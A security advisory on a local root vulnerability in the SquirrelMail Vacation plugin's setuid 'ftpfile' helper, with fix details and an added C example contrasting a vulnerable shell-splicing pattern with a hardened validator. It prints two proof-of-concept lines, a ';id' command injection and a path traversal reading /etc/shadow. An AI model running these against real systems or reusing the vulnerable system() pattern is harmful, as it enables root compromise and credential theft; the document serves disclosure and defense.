SquirrelMail Vacation Plugin FTPFile Input Validation Vulnerability
BID:12222
Info
| Bugtraq ID: | 12222 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | No |
| Local: | Yes |
| Published: | Jan 11 2005 12:00AM |
| Updated: | Jan 11 2005 12:00AM |
| Credit: | Discovery is credited to Leon Juranic. |
| Vulnerable: | SquirrelMail SquirrelMail Vacation Plugin 0.15 -1.43a; SquirrelMail SquirrelMail Vacation Plugin 0.14 -1.2rc2 |
| Not Vulnerable: | |
Discussion
The SquirrelMail Vacation plugin ships a helper binary, 'ftpfile', that is installed setuid root. The binary does not validate its command-line arguments before using them: the published proof of concept shows that a shell metacharacter (';') in an argument causes an attacker-supplied command to run with root privileges, and that a path argument containing '../' sequences is accepted, so files outside the intended directory (for example /etc/shadow) can be read as root.
Because 'ftpfile' is setuid root, a local attacker able to execute it can run commands or read files with superuser privileges.
Exploit / POC
The following examples were provided:
(command execution)
ftpfile 0 root 0 get 0 "LSS-Security;id"
(file disclosure)
ftpfile localhost root root get ../../../../etc/shadow ./shadow
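The two defects the examples above exercise, shown as an added illustration that is not the vacation plugin's code: a hypothetical setuid-root helper that splices its argv into a shell command string (so ';' in the sixth argument runs `id` as root) and passes file arguments through unchecked (so '../../../../etc/shadow' escapes the spool directory), beside a hardened form that validates every argument and execs the client directly with no shell. The function names, SAFE_DIR, and the 'ftpget' command line are assumptions; the real ftpfile's internals are not described on this page.

```c
/*
 * Added example, not code from the SquirrelMail vacation plugin.  Models the
 * two flaws the PoC above exercises in a hypothetical setuid-root helper:
 *  (1) argv spliced into a shell command string, so a ';' in an argument
 *      runs arbitrary commands with euid 0;
 *  (2) an unchecked file argument, so "../../../../etc/shadow" escapes the
 *      directory the helper was meant to confine itself to.
 * Function names, SAFE_DIR and the "ftpget" client invocation are assumed.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Directory the helper is supposed to confine file access to (assumed). */
#define SAFE_DIR "/var/spool/vacation"

/* VULNERABLE pattern: every argument is parsed by /bin/sh.
 *   ftpfile 0 root 0 get 0 "LSS-Security;id"  ->  sh runs `id` as root
 *   remote "../../../../etc/shadow"            ->  no path restriction at all
 * Not called by the demo below; shown only for contrast. */
int ftpfile_vulnerable(const char *host, const char *user, const char *pass,
                       const char *op, const char *remote, const char *local)
{
    char cmd[1024];
    snprintf(cmd, sizeof cmd, "ftpget -u %s -p %s %s %s/%s %s",
             user, pass, host, SAFE_DIR, local, remote);
    (void)op;
    return system(cmd);          /* shell metacharacters in any field are honoured */
}

/* Returns 1 if s contains anything a shell could reinterpret, else 0. */
int contains_shell_meta(const char *s)
{
    return strpbrk(s, ";|&$`<>(){}\n\r'\"\\ \t*?[]~!#") != NULL;
}

/* Accept only a bare file name: non-empty, bounded, no '/', not "." or "..".
 * This blocks traversal without having to canonicalise paths. */
int is_safe_filename(const char *name)
{
    if (name == NULL || *name == '\0' || strlen(name) > 255) return 0;
    if (strchr(name, '/') != NULL) return 0;
    if (strcmp(name, ".") == 0 || strcmp(name, "..") == 0) return 0;
    return 1;
}

/* Validate all six arguments; 0 when every field is acceptable, -1 otherwise. */
int validate_args(const char *host, const char *user, const char *pass,
                  const char *op, const char *remote, const char *local)
{
    const char *a[] = { host, user, pass, op, remote, local };
    for (size_t i = 0; i < 6; i++)
        if (a[i] == NULL || *a[i] == '\0' || contains_shell_meta(a[i])) return -1;
    if (strcmp(op, "get") != 0 && strcmp(op, "put") != 0) return -1;
    if (!is_safe_filename(remote) || !is_safe_filename(local)) return -1;
    return 0;
}

/* HARDENED pattern: validate first, then exec the client with an argv vector
 * so no shell ever sees the arguments; the local path is built under SAFE_DIR.
 * Returns the child's exit status, or -1 if validation or process setup fails. */
int ftpfile_hardened(const char *host, const char *user, const char *pass,
                     const char *op, const char *remote, const char *local)
{
    char localpath[512];
    if (validate_args(host, user, pass, op, remote, local) != 0) return -1;
    snprintf(localpath, sizeof localpath, "%s/%s", SAFE_DIR, local);

    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        /* A real helper would switch to the target user's uid here, once the
         * request is validated, so the client never runs as root. */
        execlp("ftpget", "ftpget", "-u", user, "-p", pass, host,
               localpath, remote, (char *)NULL);   /* stand-in client (assumed) */
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* The advisory's PoC arguments; only the validation path is exercised. */
    printf("injection PoC rejected: %s\n",
           validate_args("0", "root", "0", "get", "0", "LSS-Security;id") ? "yes" : "no");
    printf("traversal PoC rejected: %s\n",
           validate_args("localhost", "root", "root", "get",
                         "../../../../etc/shadow", "./shadow") ? "yes" : "no");
    return 0;
}
```

Rejecting rather than escaping is deliberate: an allow-list on file names plus a direct exec removes both the shell and the path interpretation, whereas quoting arguments for system() still leaves the helper one missed metacharacter away from root.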
Solution / Fix
Solution:
The SquirrelMail Project Team has released an upgrade for the affected plug-in that addresses this issue. Users are strongly advised to upgrade.
SquirrelMail SquirrelMail Vacation Plugin 0.14 -1.2rc2
-
SquirrelMail Vacation 1.0
http://www.squirrelmail.org/countdl.php?fileurl=http%3A%2F%2Fwww.squirrelmail.org%2Fplugins%2Fvacation_local-1.0-1.4.tar.gz
SquirrelMail SquirrelMail Vacation Plugin 0.15 -1.43a
References
References:
- Vacation Home Page (SquirrelMail)
- Squirrelmail vacation v0.15 local root exploit (LSS Security)